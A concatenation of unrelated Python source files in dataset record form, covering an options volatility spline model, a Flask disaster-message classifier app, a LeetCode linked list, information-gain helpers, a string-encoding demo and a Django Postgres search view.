here\nkeep_going = \"\"\nwhile keep_going == \"\":\n    print()\n\n    # Ask user for an integer (must be more than or equal to 1)\n    var_integer = num_check(\"Enter an integer: \") # the original passed a stray second argument that num_check() does not accept\n","sub_path":"01_integer_checker.py","file_name":"01_integer_checker.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"336859577","text":"__author__ = 'tombnorwood'\n\nimport logging\nimport math\n\nimport numpy as np\nimport xalglib\n\nfrom sqlalchemy import event\n\nfrom avkoptionsmodels.models import Base, VolModel\nfrom avkoptionsmodels.models.session import get_session_from_connection\nfrom avkoptionsmodels.models.volcurves import VolCurveInput, SkewInput\n\nfrom .ocvolcurve import OCVolCurve\n\nlog = logging.getLogger(__name__)\n\n\nclass OCFlexibleSpline(OCVolCurve):\n    __mapper_args__ = {\n        'polymorphic_identity': 'OCFlexibleSpline'\n    }\n\n    def _init_inputs(self):\n        super(OCFlexibleSpline, self)._init_atm_vol_inputs()\n        wide_skew_input = SkewInput()\n        wide_skew_input.name = \"wide_skew\"\n        wide_skew_input.value = 0.0\n        wide_skew_input.is_risk_input = True\n        wide_skew_input.default_increment = .001\n        wide_skew_input.vol_curve = self\n        wide_skew_input.display_name =
\"wide_skew\"\n wide_skew_input.display_order = 2\n \n tight_skew_input = SkewInput()\n tight_skew_input.name = \"tight_skew\"\n tight_skew_input.value = 0.0\n tight_skew_input.is_risk_input = True\n tight_skew_input.default_increment = .001\n tight_skew_input.vol_curve = self\n tight_skew_input.display_name = \"tight_skew\"\n tight_skew_input.display_order = 3\n \n put_curve_input = VolCurveInput()\n put_curve_input.name = \"put_curve\"\n put_curve_input.value = 0.0\n put_curve_input.is_risk_input = True\n put_curve_input.default_increment = .001\n put_curve_input.vol_curve = self\n put_curve_input.display_name = \"pc\"\n put_curve_input.display_order = 4\n \n call_curve_input = VolCurveInput()\n call_curve_input.name = \"call_curve\"\n call_curve_input.value = 0.0\n call_curve_input.is_risk_input = True\n call_curve_input.default_increment = .001\n call_curve_input.vol_curve = self\n call_curve_input.display_name = \"cc\"\n call_curve_input.display_order = 5\n\n put_first_input = VolCurveInput()\n put_first_input.name = \"put_first_diff\"\n put_first_input.value = 0.0\n put_first_input.is_risk_input = True\n put_first_input.default_increment = .001\n put_first_input.vol_curve = self\n put_first_input.display_name = \"p1d\"\n put_first_input.display_order = 6\n \n put_second_input = VolCurveInput()\n put_second_input.name = \"put_second_diff\"\n put_second_input.value = 0.0\n put_second_input.is_risk_input = True\n put_second_input.default_increment = .001\n put_second_input.vol_curve = self\n put_second_input.display_name = \"p2d\"\n put_second_input.display_order = 7\n \n put_wing_input = VolCurveInput()\n put_wing_input.name = \"put_wing_diff\"\n put_wing_input.value = 0.0\n put_wing_input.is_risk_input = True\n put_wing_input.default_increment = .001\n put_wing_input.vol_curve = self\n put_wing_input.display_name = \"pwd\"\n put_wing_input.display_order = 8\n \n put_first_x_input = VolCurveInput()\n put_first_x_input.name = \"put_first_x\"\n put_first_x_input.value = 0.0\n put_first_x_input.is_risk_input = False\n put_first_x_input.default_increment = .1\n put_first_x_input.vol_curve = self\n put_first_x_input.display_name = \"p1x\"\n put_first_x_input.display_order = 9\n \n put_second_x_input = VolCurveInput()\n put_second_x_input.name = \"put_second_x\"\n put_second_x_input.value = 0.0\n put_second_x_input.is_risk_input = False\n put_second_x_input.default_increment = .1\n put_second_x_input.vol_curve = self\n put_second_x_input.display_name = \"p2x\"\n put_second_x_input.display_order = 10\n \n put_wing_x_input = VolCurveInput()\n put_wing_x_input.name = \"put_wing_x\"\n put_wing_x_input.value = 0.0\n put_wing_x_input.is_risk_input = False\n put_wing_x_input.default_increment = .1\n put_wing_x_input.vol_curve = self\n put_wing_x_input.display_name = \"pwx\"\n put_wing_x_input.display_order = 11\n\n call_first_input = VolCurveInput()\n call_first_input.name = \"call_first_diff\"\n call_first_input.value = 0.0\n call_first_input.is_risk_input = True\n call_first_input.default_increment = .001\n call_first_input.vol_curve = self\n call_first_input.display_name = \"c1d\"\n call_first_input.display_order = 12\n\n call_second_input = VolCurveInput()\n call_second_input.name = \"call_second_diff\"\n call_second_input.value = 0.0\n call_second_input.is_risk_input = True\n call_second_input.default_increment = .001\n call_second_input.vol_curve = self\n call_second_input.display_name = \"c2d\"\n call_second_input.display_order = 13\n\n call_wing_input = VolCurveInput()\n 
call_wing_input.name = \"call_wing_diff\"\n call_wing_input.value = 0.0\n call_wing_input.is_risk_input = True\n call_wing_input.default_increment = .001\n call_wing_input.vol_curve = self\n call_wing_input.display_name = \"cwd\"\n call_wing_input.display_order = 14\n\n call_first_x_input = VolCurveInput()\n call_first_x_input.name = \"call_first_x\"\n call_first_x_input.value = 0.0\n call_first_x_input.is_risk_input = False\n call_first_x_input.default_increment = .1\n call_first_x_input.vol_curve = self\n call_first_x_input.display_name = \"c1x\"\n call_first_x_input.display_order = 15\n\n call_second_x_input = VolCurveInput()\n call_second_x_input.name = \"call_second_x\"\n call_second_x_input.value = 0.0\n call_second_x_input.is_risk_input = False\n call_second_x_input.default_increment = .1\n call_second_x_input.vol_curve = self\n call_second_x_input.display_name = \"c2x\"\n call_second_x_input.display_order = 16\n\n call_wing_x_input = VolCurveInput()\n call_wing_x_input.name = \"call_wing_x\"\n call_wing_x_input.value = 0.0\n call_wing_x_input.is_risk_input = False\n call_wing_x_input.default_increment = .1\n call_wing_x_input.vol_curve = self\n call_wing_x_input.display_name = \"cwx\"\n call_wing_x_input.display_order = 17\n\n put_wing_slope_input = VolCurveInput()\n put_wing_slope_input.name = \"put_wing_slope_diff\"\n put_wing_slope_input.value = 0.0\n put_wing_slope_input.is_risk_input = True\n put_wing_slope_input.default_increment = -.01\n put_wing_slope_input.vol_curve = self\n put_wing_slope_input.display_name = \"pwsd\"\n put_wing_slope_input.display_order = 18\n\n call_wing_slope_input = VolCurveInput()\n call_wing_slope_input.name = \"call_wing_slope_diff\"\n call_wing_slope_input.value = 0.0\n call_wing_slope_input.is_risk_input = True\n call_wing_slope_input.default_increment = .01\n call_wing_slope_input.vol_curve = self\n call_wing_slope_input.display_name = \"cwsd\"\n call_wing_slope_input.display_order = 19\n\n def _build_interpolant(self, time_to_exp, atm_strike, atm_vol,\n put_first, put_second, put_wing,\n put_first_x, put_second_x, put_wing_x,\n call_first, call_second, call_wing,\n call_first_x, call_second_x, call_wing_x,\n put_wing_slope=None, call_wing_slope=None):\n # spline_x defined as strikes spaced according to std deviations from atm\n std_dev = atm_strike * atm_vol * math.sqrt(time_to_exp)\n spline_x = np.array((put_wing_x, put_second_x, put_first_x, 0.0, call_first_x, call_second_x, call_wing_x))\n spline_x *= std_dev\n\n if not spline_x.any():\n log.error(\"spline_x points are all equal, unable to build spline: spline_x=%s\", spline_x)\n raise ValueError(\"spline_x points are all equal, unable to build spline\")\n spline_x += atm_strike\n\n # spline_y defined as atm_vol plus offset at each curve point\n spline_y = np.array((put_wing, put_second, put_first, 0.0, call_first, call_second, call_wing))\n spline_y += atm_vol\n\n log.debug(\"spline_x: %s\", spline_x)\n log.debug(\"spline_y: %s\", spline_y)\n if put_wing_slope and call_wing_slope:\n # build clamped spline where terminal d'=wing_slope and d''=0\n log.debug(\"building clamped cubic spline\")\n spline_interpolant = xalglib.spline1dbuildcubic(list(spline_x), list(spline_y), 7, 1, put_wing_slope, 1, call_wing_slope)\n else:\n # build natural spline where boundaries are parabolically terminated\n log.debug(\"building parabolically terminated cubic spline\")\n spline_interpolant = xalglib.spline1dbuildcubic(list(spline_x), list(spline_y), 7, 0, 0, 0, 0)\n return spline_interpolant\n\n def 
_get_calc_inputs_from_curve_inputs(self, time_to_exp, atm_strike, atm_vol,\n wide_skew, tight_skew, put_curve, call_curve,\n put_first_diff, put_second_diff, put_wing_diff,\n put_first_x, put_second_x, put_wing_x,\n call_first_diff, call_second_diff, call_wing_diff,\n call_first_x, call_second_x, call_wing_x,\n put_wing_slope_diff, call_wing_slope_diff):\n put_first = put_first_x * (wide_skew + tight_skew) + put_first_x**2 * put_curve + put_first_diff\n put_second = put_second_x * wide_skew + put_second_x**2 * put_curve + put_second_diff\n put_wing = put_wing_x * wide_skew + put_wing_x**2 * put_curve + put_wing_diff\n call_first = call_first_x * (wide_skew + tight_skew) + call_first_x**2 * call_curve + call_first_diff\n call_second = call_second_x * wide_skew + call_second_x**2 * call_curve + call_second_diff\n call_wing = call_wing_x * wide_skew + call_wing_x**2 * call_curve + call_wing_diff\n log.debug(\"time_to_exp: %s\", time_to_exp)\n log.debug(\"atm_strike: %s\", atm_strike)\n log.debug(\"atm_vol: %s\", atm_vol)\n log.debug(\"put_first: %s\", put_first)\n log.debug(\"put_second: %s\", put_second)\n log.debug(\"put_wing: %s\", put_wing)\n log.debug(\"call_first: %s\", call_first)\n log.debug(\"call_second: %s\", call_second)\n log.debug(\"call_wing: %s\", call_wing)\n try:\n interpolant = \\\n self._build_interpolant(time_to_exp, atm_strike, atm_vol,\n put_first, put_second, put_wing,\n put_first_x, put_second_x, put_wing_x,\n call_first, call_second, call_wing,\n call_first_x, call_second_x, call_wing_x,\n put_wing_slope=None, call_wing_slope=None)\n std_dev = atm_strike * atm_vol * math.sqrt(time_to_exp)\n put_wing_strike = std_dev * put_wing_x + atm_strike\n put_wing_vol = put_wing + atm_vol\n call_wing_strike = std_dev * call_wing_x + atm_strike\n call_wing_vol = call_wing + atm_vol\n incremented_put_strike_vol = xalglib.spline1dcalc(interpolant, put_wing_strike + 1.0)\n incremented_call_strike_vol = xalglib.spline1dcalc(interpolant, call_wing_strike - 1.0)\n log.debug(\"std_dev: %s\", std_dev)\n log.debug(\"put_wing_strike: %s\", put_wing_strike)\n log.debug(\"put_wing_vol: %s\", put_wing_vol)\n log.debug(\"call_wing_strike: %s\", call_wing_strike)\n log.debug(\"call_wing_vol: %s\", call_wing_vol)\n log.debug(\"incremented_put_strike_vol: %s\", incremented_put_strike_vol)\n log.debug(\"incremented_call_strike_vol: %s\", incremented_call_strike_vol)\n put_wing_slope = incremented_put_strike_vol - put_wing_vol + put_wing_slope_diff\n call_wing_slope = call_wing_vol - incremented_call_strike_vol + call_wing_slope_diff\n except ValueError:\n log.error(\"error when calculating implied slopes\")\n put_wing_slope = 0 + put_wing_slope_diff\n call_wing_slope = 0 + call_wing_slope_diff\n log.debug(\"put_wing_slope: %s\", put_wing_slope)\n log.debug(\"call_wing_slope: %s\", call_wing_slope)\n calc_inputs = {\n \"atm_strike\": atm_strike,\n \"atm_vol\": atm_vol,\n \"put_first\": put_first,\n \"put_second\": put_second,\n \"put_wing\": put_wing,\n \"put_first_x\": put_first_x,\n \"put_second_x\": put_second_x,\n \"put_wing_x\": put_wing_x,\n \"call_first\": call_first,\n \"call_second\": call_second,\n \"call_wing\": call_wing,\n \"call_first_x\": call_first_x,\n \"call_second_x\": call_second_x,\n \"call_wing_x\": call_wing_x,\n \"put_wing_slope\": put_wing_slope,\n \"call_wing_slope\": call_wing_slope,\n }\n return calc_inputs\n\n def calc_strike_vols(self, strikes, underlying_price, time_to_exp, atm_strike, atm_vol,\n wide_skew, tight_skew, put_curve, call_curve,\n put_first_diff, 
put_second_diff, put_wing_diff,\n put_first_x, put_second_x, put_wing_x,\n call_first_diff, call_second_diff, call_wing_diff,\n call_first_x, call_second_x, call_wing_x,\n put_wing_slope_diff, call_wing_slope_diff):\n if time_to_exp <= 0.0:\n log.warn(\"time_to_exp<=0, returning atm_vol for all strike vols: atm_vol=%s\", atm_vol)\n strike_vols = np.empty_like(strikes)\n strike_vols.fill(atm_vol)\n return strike_vols\n calc_inputs = \\\n self._get_calc_inputs_from_curve_inputs(time_to_exp, atm_strike, atm_vol,\n wide_skew, tight_skew, put_curve, call_curve,\n put_first_diff, put_second_diff, put_wing_diff,\n put_first_x, put_second_x, put_wing_x,\n call_first_diff, call_second_diff, call_wing_diff,\n call_first_x, call_second_x, call_wing_x,\n put_wing_slope_diff, call_wing_slope_diff)\n try:\n interpolant = self._build_interpolant(time_to_exp, **calc_inputs)\n\n # calculate boundary conditions\n std_dev = atm_strike * atm_vol * math.sqrt(time_to_exp)\n put_wing_strike = put_wing_x * std_dev + atm_strike\n put_wing_vol = calc_inputs[\"put_wing\"] + atm_vol\n put_wing_slope = calc_inputs[\"put_wing_slope\"]\n call_wing_strike = call_wing_x * std_dev + atm_strike\n call_wing_vol = calc_inputs[\"call_wing\"] + atm_vol\n call_wing_slope = calc_inputs[\"call_wing_slope\"]\n\n strike_vols = np.empty_like(strikes, dtype=float)\n for i, strike in enumerate(strikes):\n if strike < put_wing_strike:\n strike_vol = put_wing_vol + (strike - put_wing_strike) * put_wing_slope\n elif strike > call_wing_strike:\n strike_vol = call_wing_vol + (strike - call_wing_strike) * call_wing_slope\n else:\n strike_vol = xalglib.spline1dcalc(interpolant, strike)\n strike_vols[i] = strike_vol\n except ValueError:\n log.error(\"unable to build cubic spline, return atm_vol for all vols: atm_vol=%s\", atm_vol)\n strike_vols = np.empty_like(strikes)\n strike_vols.fill(atm_vol)\n return strike_vols\n\n\n@event.listens_for(Base.metadata, \"after_create\")\ndef prepopulate_vol_models(target, connection, **kw):\n session = get_session_from_connection(connection)\n vol_model = VolModel(name=\"OCFlexibleSpline\")\n session.add(vol_model)\n session.commit()\n","sub_path":"models/volcurves/optionscity/ocflexiblespline.py","file_name":"ocflexiblespline.py","file_ext":"py","file_size_in_byte":16359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"76073765","text":"import json\nimport pickle\nimport sys\n\nimport numpy as np\nimport pandas as pd\nimport plotly\nfrom flask import Flask\nfrom flask import render_template, request\nfrom plotly.graph_objs import Bar\n\nsys.path.append(\".\")\nsys.path.append(\"../\")\nfrom models import train_classifier as tc\n\napp = Flask(__name__)\n\n_pipe = None\n_clf1 = None\n_clf2 = None\n\n\ndef load_model(model_filepath):\n global _pipe, _clf1, _clf2\n with open(model_filepath, 'rb') as f:\n rodelbahn_model = pickle.load(f)\n _pipe = rodelbahn_model[\"pipe\"]\n _clf1 = rodelbahn_model[\"clf1\"]\n _clf2 = rodelbahn_model[\"clf2\"]\n\n\ndef text_prep(text):\n global _pipe\n return _pipe.transform(np.array([text]))\n\n\ndef apply_model(x_transformed):\n global _clf1, _clf2\n labels_zuordnung_mlp = _clf1.classes_\n y_pred_mlp_proba = _clf1.predict_proba(x_transformed)\n y_pred_mlp_label = np.array([labels_zuordnung_mlp[np.argmax(t)] for t in y_pred_mlp_proba])\n y_pred_moc_labels = np.array(_clf2.predict(x_transformed))\n return y_pred_mlp_label, y_pred_moc_labels\n\n\n# load data\nDATA, Y, target = tc.load_data(\"./data/DisasterResponse.db\")\nY 
= pd.DataFrame(Y)\nY.columns = target\n\n# load model\nload_model(\"./data/rodelbahn_model.pckl\")\n\n\ndef show_example():\n t = pd.Series(DATA).sample()\n print(t.iloc[0])\n print(Y.iloc[int(t.index[0])].to_dict())\n\n\n# index webpage displays 2 visuals and receives user input text for model's prediction\n@app.route('/')\n@app.route('/index')\ndef index():\n res = Y.groupby('genre').count()\n genre_counts = list(res.values[:, 0])\n genre_names = list(res.index)\n\n xdf = Y.copy()\n for xcol in xdf.columns:\n if xcol != 'genre':\n xdf[xcol] = [int(t) for t in xdf[xcol]]\n\n res = xdf[xdf['genre'] == \"direct\"].mean().sort_values(ascending=False)\n needs_percentage = res.values.tolist()\n needs_labels = res.index.values.tolist()\n\n graphs = [\n {\n 'data': [\n Bar(\n x=genre_names,\n y=genre_counts\n )\n ],\n\n 'layout': {\n 'title': 'Count of messages per genre',\n 'yaxis': {\n 'title': \"Count\"\n },\n 'xaxis': {\n 'title': \"Genre\"\n }\n }\n },\n {\n 'data': [\n Bar(\n x=needs_labels,\n y=needs_percentage\n )\n ],\n\n 'layout': {\n 'title': 'Most current needs for direct messages',\n 'yaxis': {\n 'title': \"Count\"\n },\n 'xaxis': {\n 'title': \"\",\n 'tickangle': 45\n }\n }\n }\n ]\n\n # encode plotly graphs in JSON\n ids = [\"graph-{}\".format(i) for i, _ in enumerate(graphs)]\n graphJSON = json.dumps(graphs, cls=plotly.utils.PlotlyJSONEncoder)\n\n # render web page with plotly graphs\n return render_template('master.html', ids=ids, graphJSON=graphJSON)\n\n\n# web page that handles user query and displays model results\n@app.route('/go')\ndef go():\n query = request.args.get('query', '')\n y_pred_mlp_label, y_pred_moc_labels = apply_model(text_prep(query))\n\n # leads to output such as: \"Genre: direct\", always 1\n classification_results = dict(zip(\n [\"Genre: {}\".format(y_pred_mlp_label[0])] + target[1:],\n [\"1\"] + list(y_pred_moc_labels[0])))\n return render_template(\n 'go.html',\n query=query,\n classification_result=classification_results\n )\n\n\ndef main():\n app.run(host='0.0.0.0', port=3001, debug=True)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"app/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":3735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"339244743","text":"#import re\n#f=open('liste_verbes_kabyles.txt', 'r', encoding='utf-8')\n#new_file= [line for line in f]\n#print(f.readlines())\n\nreplacements = {'0':'', '1':'', '2':'','3':'', '4':'', '5':'','6':'', '7':'', '8':'', '9':''}\n\nwith open('copieVerbesKabyles.txt', 'r', encoding='utf-8') as infile, open('verbes_kabyles.txt', 'w', encoding='utf-8') as outfile:\n myList= list(infile)\n mylist = [line.rstrip('\\n') for line in infile]\n for line in myList:\n for src, target in replacements.items():\n line = line.replace(src, target)\n\n newFile=outfile.write(line)\n\n\nwith open('verbes_kabyles.txt', 'r', encoding='utf-8') as f:\n m = [line.split('(') for line in f]\n","sub_path":"strip_digits.py","file_name":"strip_digits.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"503964177","text":"'''\nDesign your implementation of the linked list. You can choose to use the singly\nlinked list or the doubly linked list. A node in a singly linked list should\nhave two attributes: val and next. val is the value of the current node, and\nnext is a pointer/reference to the next node. 
If you want to use the doubly\nlinked list, you will need one more attribute prev to indicate the previous\nnode in the linked list. Assume all nodes in the linked list are 0-indexed.\nImplement these functions in your linked list class:\nget(index) : Get the value of the index-th node in the linked list. If the\nindex is invalid, return -1.\naddAtHead(val) : Add a node of value val before the first element of the linked\nlist. After the insertion, the new node will be the first node of the linked\nlist.\naddAtTail(val) : Append a node of value val to the last element of the linked\nlist.\naddAtIndex(index, val) : Add a node of value val before the index-th node in\nthe linked list. If index equals to the length of linked list, the node will\nbe appended to the end of linked list. If index is greater than the length, the node will not be inserted.\ndeleteAtIndex(index) : Delete the index-th node in the linked list, if the\nindex is valid.\nExample:\nMyLinkedList linkedList = new MyLinkedList();\nlinkedList.addAtHead(1);\nlinkedList.addAtTail(3);\nlinkedList.addAtIndex(1, 2); // linked list becomes 1->2->3\nlinkedList.get(1); // returns 2\nlinkedList.deleteAtIndex(1); // now the linked list is 1->3\nlinkedList.get(1); // returns 3\nNote:\nAll values will be in the range of [1, 1000].\nThe number of operations will be in the range of [1, 1000].\nPlease do not use the built-in LinkedList library.\n'''\n\nimport logging\nlogging.basicConfig(filename=\"test.log\", level=logging.DEBUG)\ndebug = logging.debug\n\n####################################################################################\nclass Node(object):\n def __init__(self, val=None):\n self.val = val # store the given value on the node (was always None)\n self.next_node = None\n\n\n# no-op override: intentionally silences the logging-based debug() bound above\ndef debug(arg):\n pass\n\n\nclass MyLinkedList(object):\n def __init__(self):\n \"\"\"\n Initialize your data structure here.\n \"\"\"\n self.head = Node()\n self.head.next_node = Node()\n\n\n def debug_whole_list(self):\n if not self.check_node_has_value(self.head):\n debug('No list to debug')\n return\n\n current_node = self.head\n\n list_to_debug = []\n\n while self.check_node_has_value(current_node):\n list_to_debug.append(current_node.val)\n current_node = current_node.next_node\n\n debug('{}'.format(list_to_debug))\n\n\n def print_whole_list(self):\n if not self.check_node_has_value(self.head):\n print('No list to print')\n return\n\n current_node = self.head\n\n list_to_print = []\n\n while self.check_node_has_value(current_node):\n list_to_print.append(current_node.val)\n current_node = current_node.next_node\n\n print('{}'.format(list_to_print))\n\n\n def return_whole_list(self):\n if not self.check_node_has_value(self.head):\n return 'No list to print'\n\n current_node = self.head\n\n list_to_return = []\n\n while self.check_node_has_value(current_node):\n list_to_return.append(current_node.val)\n current_node = current_node.next_node\n\n return list_to_return\n\n\n def check_node_has_value(self, node):\n \"\"\"\n Checks if a node exists and has a value\n deals with if the value is zero\n :param node: Node() \n :return: Boolean\n \"\"\"\n\n if node.val == 0:\n return True\n elif node.val == None:\n return False\n else:\n return True\n\n\n def create_new_node(self, val=None):\n self.new_node = Node()\n self.new_node.val = val\n self.new_node.next_node = Node()\n return self.new_node\n\n\n def get(self, index):\n \"\"\"\n Get the value of the index-th node in the linked list. 
If the index is\n invalid, return -1.\n :type index: int\n :rtype: int\n \"\"\"\n if not self.check_node_has_value(self.head):\n return -1\n\n self.current_node = self.head\n debug('---for loop in to get value at index about to begin---')\n\n for i in range(index):\n self.current_node = self.current_node.next_node\n if not self.check_node_has_value(self.current_node):\n return -1\n\n return self.current_node.val\n\n\n def addAtHead(self, val):\n \"\"\"\n Add a node of value val before the first element of the linked list.\n After the insertion, the new node will be the first node of the linked\n list.\n :type val: int\n :rtype: void\n \"\"\"\n\n new_node = Node()\n new_node.val = val# if val != 0 else 'zero'\n new_node.next_node = self.head\n self.head = new_node\n debug('addAtHead({})'.format(val))\n\n\n def traverse_to_tail(self):\n\n self.current_node = self.head\n\n while self.check_node_has_value(self.current_node.next_node):\n self.current_node = self.current_node.next_node\n\n return self.current_node\n\n\n def traverse_to_index(self, index):\n\n if not self.check_node_has_value(self.head)\\\n or not self.check_node_has_value(self.head.next_node):\n return self.head\n\n self.current_node = self.head\n for i in range(index-1):\n self.current_node = self.current_node.next_node\n if not self.check_node_has_value(self.current_node):\n return -1\n return self.current_node\n\n\n def addAtTail(self, val):\n \"\"\"\n Append a node of value val to the last element of the linked list.\n :type val: int\n :rtype: void\n \"\"\"\n\n if not self.check_node_has_value(self.head):\n self.head.val = val\n return\n\n self.new_node = self.create_new_node(val)\n self.current_node = self.traverse_to_tail()\n self.current_node.next_node = self.new_node\n\n\n def addAtIndex(self, index, val):\n \"\"\"\n Add a node of value val before the index-th node in the linked list. If index equals to the length of linked list, the node will be appended to the end of linked list. 
If index is greater than the length, the node will not be inserted.\n :type index: int\n :type val: int\n :rtype: void\n \"\"\"\n\n if index == 0:\n self.new_node = Node()\n self.new_node.val = val\n self.new_node.next_node = self.head\n self.head = self.new_node\n return\n\n # check if head of list has a value, exit function if not\n if not self.check_node_has_value(self.head):\n return\n\n # make new node\n self.new_node = self.create_new_node(val)\n\n # traverse list\n self.current_node = self.traverse_to_index(index)\n if self.current_node == -1:\n return\n else:\n if self.check_node_has_value(self.current_node.next_node):\n self.node_after = self.current_node.next_node\n self.current_node.next_node = self.new_node\n self.new_node.next_node = self.node_after\n else:\n self.current_node.next_node = self.new_node\n\n\n def deleteAtIndex(self, index):\n \"\"\"\n Delete the index-th node in the linked list, if the index is valid.\n :type index: int\n :rtype: void\n \"\"\"\n # check if head of list has a value, exit function if not\n if not self.check_node_has_value(self.head):\n return\n\n self.current_node = self.traverse_to_index(index)\n if self.current_node == -1:\n return\n\n if not self.check_node_has_value(self.current_node):\n return -1\n\n # check if the node after the one you want to delete exists\n if not self.check_node_has_value(self.current_node.next_node):\n # assign value of the current_node's next node to None, end function\n self.current_node.next_node = Node()\n debug('Breaking loop for deleteAtIndex as the index to be deleted was the final one')\n return\n\n # if node two places after exists assign it to current_node.next_node\n self.current_node.next_node = self.current_node.next_node.next_node\n\n debug('deleteAtIndex({})'.format(index))\n\n\n\n\n\n\n\n\n\n\n","sub_path":"leetcode_problems/completed/Design_Linked_List.py","file_name":"Design_Linked_List.py","file_ext":"py","file_size_in_byte":8541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"15038205","text":"from math import log\n\ndef calc_information(p, n):\n t = float(p+n)\n pt = p/t\n nt = n/t\n ip = -pt*log(pt, 2) if pt!=0 else 0.0\n it = -nt*log(nt, 2) if nt!=0 else 0.0\n return ip+it\n\ndef calc_entropy(t, l):\n entropy = 0.0\n for p, n in l:\n entropy += float(p+n)/t * calc_information(p, n)\n return entropy\n\ndef calc_gain(p, n, l):\n entropy = calc_entropy(p+n, l)\n information = calc_information(p, n)\n return information - entropy\n\ndef calc_gain_ratio(p, n, l):\n gain = calc_gain(p, n, l)\n t = float(p+n)\n splitInfo = 0.0\n for pi, ni in l:\n ti = (pi+ni)/t\n si = -ti*log(ti, 2)\n splitInfo += si\n return gain / splitInfo\n","sub_path":"DM/hw2/Information-gain-ration.py","file_name":"Information-gain-ration.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"19935336","text":"# Python code to demonstate String encoding\n\n### Encoding ####\n\n# initialisting a String\na = 'GeeksforGeeks'\n\n# initialisiting a byte object\nc = b'GeeksforGeeks'\n\nd = a.encode('ASCII')\n\nif (d==c) :\n\tprint (\"Encoding succesful\")\nelse : print (\"Encoding Unsuccessful\")\n\n### Decoding ###\n\na = \"GeeksforGeeks\"\n\nc = b'GeeksforGeeks'\n\nd = c.decode('ASCII')\n\nif(d==a):\n\tprint (\"Decoding successful\")\nelse: print (\"Decoding 
Unsuccessful\")","sub_path":"python/basic/variables/byte-object-vs-string.py","file_name":"byte-object-vs-string.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"638215414","text":"from django.shortcuts import render\n# Modules required for the postgres search features\nfrom django.contrib.postgres.search import SearchQuery, SearchVector, SearchRank, SearchHeadline\n# Postgres TrigramSimilarity and TrigramDistance modules\nfrom django.contrib.postgres.search import TrigramSimilarity, TrigramDistance\nfrom django.db.models import Count\n\nfrom book.forms import PostSearchForm\nfrom book.models import Book\n\n\ndef post_search(request):\n\n form = PostSearchForm\n results = []\n q = None\n\n # take the information from HTML, which is 'q' from form.\n if 'q' in request.GET:\n form = PostSearchForm(request.GET)\n if form.is_valid():\n q = form.cleaned_data['q']\n # print(q)\n\n # select ... from \"book_book\" where UPPER(\"book_book\".\"title\"::text)\n # LIKE UPPER(%%)\n\n \"\"\"\n When a query is executed: \n 1. Assume we write a query in SQL, using some script that describes \n\t\t which data we want to fetch from the server.\n 2. The server can collect the requested data in many different ways. \n A mechanism called the query planner runs; the query planner is the \n mechanism that finds the fastest way to execute our query, \n based on evaluating the execution time of the candidate plans. \n 3. The plan with the fastest execution time runs on the server.\n 4. The server returns the result. \n \n Execution time: the time spent in steps 3 and 4. \n Planning time: step 2 only. \n \n # Analyze the query's execution time and planning time.\n # print(Book.objects.filter(title__icontains=q).explain(analyze=True))\n \"\"\"\n\n\n \"\"\"\n # Standard textual queries (case sensitive)\n results = Book.objects.filter(title__contains=q)\n \n print(Book.objects.filter(title__contains=q).explain(verbose=True, analyze=True))\n print(Book.objects.filter(title__contains=q).query)\n \n\n \"\"\"\n\n\n # # Using SearchVector (searches several fields at once)\n \n # # Based on the string value of q, fetch the objects stored in the \n # # title and authors fields, and keep title and authors in the\n # # temporarily added search field.\n\n # results = Book.objects.annotate(search=SearchVector('title', 'authors'),).filter(search=q)\n\n # # Side note: annotate\n # # For instance, to count how many books each author has written, use annotate like this.\n # results = Book.objects.values('authors').annotate(num_books=Count('title')).order_by('-num_books')\n # print(results)\n\n\n # # Using SearchRank\n # # Used to find the most relevant document, by assigning a weight to\n # # how relevant each document is to the query.\n # vector = SearchVector('title')\n # query = SearchQuery(q)\n # results = Book.objects.annotate(rank=SearchRank(vector, query)).order_by('-rank')\n\n\n\n # Weighted ranking (a higher score means higher importance)\n # D-weight: 0.1, C:0.2, B:0.4, A:1.0\n # 'Harris' is matched because 'Harr' inside Author is weighted as well\n\n # vector = SearchVector('title', weight='B') + SearchVector('authors', weight='A')\n # query = SearchQuery(q)\n\n # vector = SearchVector('title', weight='B') + SearchVector('authors', weight='B')\n # query = SearchQuery(q)\n #\n # results = Book.objects.annotate(rank=SearchRank(vector, query, cover_density=True)).order_by('-rank')\n\n\n # Normalization is sometimes used in text search.\n # Normalization merges words with different surface forms into the same word.\n\n \"\"\"\n Trigram (or trigraph) concept: \n a group of three consecutive characters taken from a string.\n \n Trigram similarity is measured by the number of trigrams \n the two strings share.\n \n e.g.: Dog -> \"d\", \"do\", \"dog\", \"og\"\n \"\"\"\n\n print(q)\n \n # Using TrigramSimilarity & TrigramDistance\n #results = Book.objects.annotate(similarity=TrigramSimilarity('title', q),).filter(similarity__gte=0.3).order_by('-similarity')\n #results = Book.objects.annotate(distance=TrigramDistance('title', q),).filter(distance__lte=0.8).order_by('distance')\n\n\n # Headline Search\n # query = SearchQuery(q)\n # vector = SearchVector('authors')\n # results = Book.objects.annotate(search=vector, headline=SearchHeadline('authors', query)).filter(search=query)\n\n # Wrap the authors values in the result with an HTML span class\n # results = Book.objects.annotate(search=vector, headline=SearchHeadline('authors', query, start_sel='', stop_sel='')).filter(search=query)\n\n\n\n print(\"#1\")\n print(Book.objects.filter(title__trigram_similar=q).explain(analyze=True))\n print(\"#2\")\n print(Book.objects.filter(\n title__trigram_similar=q).annotate(\n similar=TrigramSimilarity('title', q)).order_by('-similar').explain(analyze=True))\n\n return render(request, 'index.html', {'form':form, 'results':results, 'q':q})\n\n\"\"\" \nQuerying without a GIN index\n\n# 1\nPlanning Time: 4.965 ms\nExecution Time: 128.473 ms\n\n#2\nPlanning Time: 2.511 ms\nExecution Time: 142.305 